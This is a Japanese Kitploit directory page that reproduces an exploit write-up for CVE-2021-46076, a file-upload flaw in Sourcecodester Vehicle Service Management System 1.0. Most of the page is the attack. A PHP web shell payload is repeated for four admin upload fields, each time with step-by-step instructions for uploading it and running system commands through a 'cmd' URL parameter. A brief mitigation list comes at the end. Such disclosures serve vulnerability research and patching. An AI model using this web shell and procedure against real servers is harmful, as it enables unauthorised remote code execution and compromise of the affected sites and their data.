Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-46076 — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 にはファイルアップロードの脆弱性があります。攻撃者は複数のエンドポイントで悪意のある php ファイルをアップロードでき、コード実行につながります。 | Kitploit
ツール/GitHubGitHub/sanupl/cve-2021-46076
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubsanupl/cve-2021-46076

CVE-2021-46076

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 にはファイルアップロードの脆弱性があります。攻撃者は複数のエンドポイントで悪意のある php ファイルをアップロードでき、コード実行につながります。

リポジトリを見る
114ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-46076

エクスプロイトタイトル: Vehicle Service Management System - 'Multiple' ファイルアップロードがコード実行を引き起こす

エクスプロイト作者: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 HIGH

参考:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

説明:

Sourcecodester Vehicle Service Management System 1.0 はファイルアップロードに対して脆弱です。攻撃者は複数のエンドポイントで悪意のある PHP ファイルをアップロードでき、コード実行につながります。

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

エクスプロイト:

  1. 管理パネルにログインします http://localhost/vehicle_service/admin
  2. My Account セクションに移動します http://localhost/vehicle_service/admin/?page=user

ペイロード:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. 上記の PHP コードを保存します(例: Cmd.php)
  2. My Account セクションで必要な詳細をすべて入力し、Avatar で PHP ファイルを参照して選択します。
  3. 更新ボタンをクリックします。
  4. アバター画像を新しいタブで開きます。
  5. URL に cmd パラメータを追加してコマンドを実行します。
  6. 最終 URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. すべてのシステムコマンドを実行します(例: id、whoami、pwd など)。

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

エクスプロイト:

  1. 管理パネルにログインします http://localhost/vehicle_service/admin
  2. User List セクションに移動し、Create New ボタンをクリックします。

ペイロード:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. 上記の PHP コードを保存します(例: Cmd.php)
  2. Create New User ページで必要な詳細をすべて入力し、Avatar で PHP ファイルを参照して選択します。
  3. 保存ボタンをクリックします。
  4. アバター画像を新しいタブで開きます。
  5. URL に cmd パラメータを追加してコマンドを実行します。
  6. 最終 URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. すべてのシステムコマンドを実行します(例: id、whoami、pwd など)。

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

エクスプロイト:

  1. 管理パネルにログインします http://localhost/vehicle_service/admin
  2. Settings セクションに移動します http://localhost/vehicle_service/admin/?page=system_info

ペイロード:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. 上記の PHP コードを保存します(例: Cmd.php)
  2. Settings セクションで必要な詳細をすべて入力し、System Logo で PHP ファイルを参照して選択します。
  3. 更新ボタンをクリックします。
  4. System Logo 画像を新しいタブで開きます。
  5. URL に cmd パラメータを追加してコマンドを実行します。
  6. 最終 URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. すべてのシステムコマンドを実行します(例: id、whoami、pwd など)。

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

エクスプロイト:

  1. 管理パネルにログインします http://localhost/vehicle_service/admin
  2. Settings セクションに移動します http://localhost/vehicle_service/admin/?page=system_info

ペイロード:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. 上記の PHP コードを保存します(例: Cmd.php)
  2. Settings セクションで必要な詳細をすべて入力し、Website Cover で PHP ファイルを参照して選択します。
  3. 更新ボタンをクリックします。
  4. Website Cover 画像を新しいタブで開きます。
  5. URL に cmd パラメータを追加してコマンドを実行します。
  6. 最終 URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. すべてのシステムコマンドを実行します(例: id、whoami、pwd など)。

影響:

攻撃者は複数のエンドポイントで悪意のある PHP ファイルをアップロードでき、コード実行につながります。

対策:

以下の実装が推奨されます:

  • ホワイトリストフィルターなしにファイル名と拡張子を直接受け入れないこと。
  • Unicode 文字が必要ない場合は、ファイル名と拡張子の入力として英数字とドット 1 つのみを受け入れることを強く推奨します。
  • サービス拒否攻撃を防ぐために、ファイルサイズを最大値に制限すること。
  • アップロードディレクトリには「実行」権限を付与しないこと。
  • クライアントサイドの検証のみに依存しないこと。
ツールをダウンロード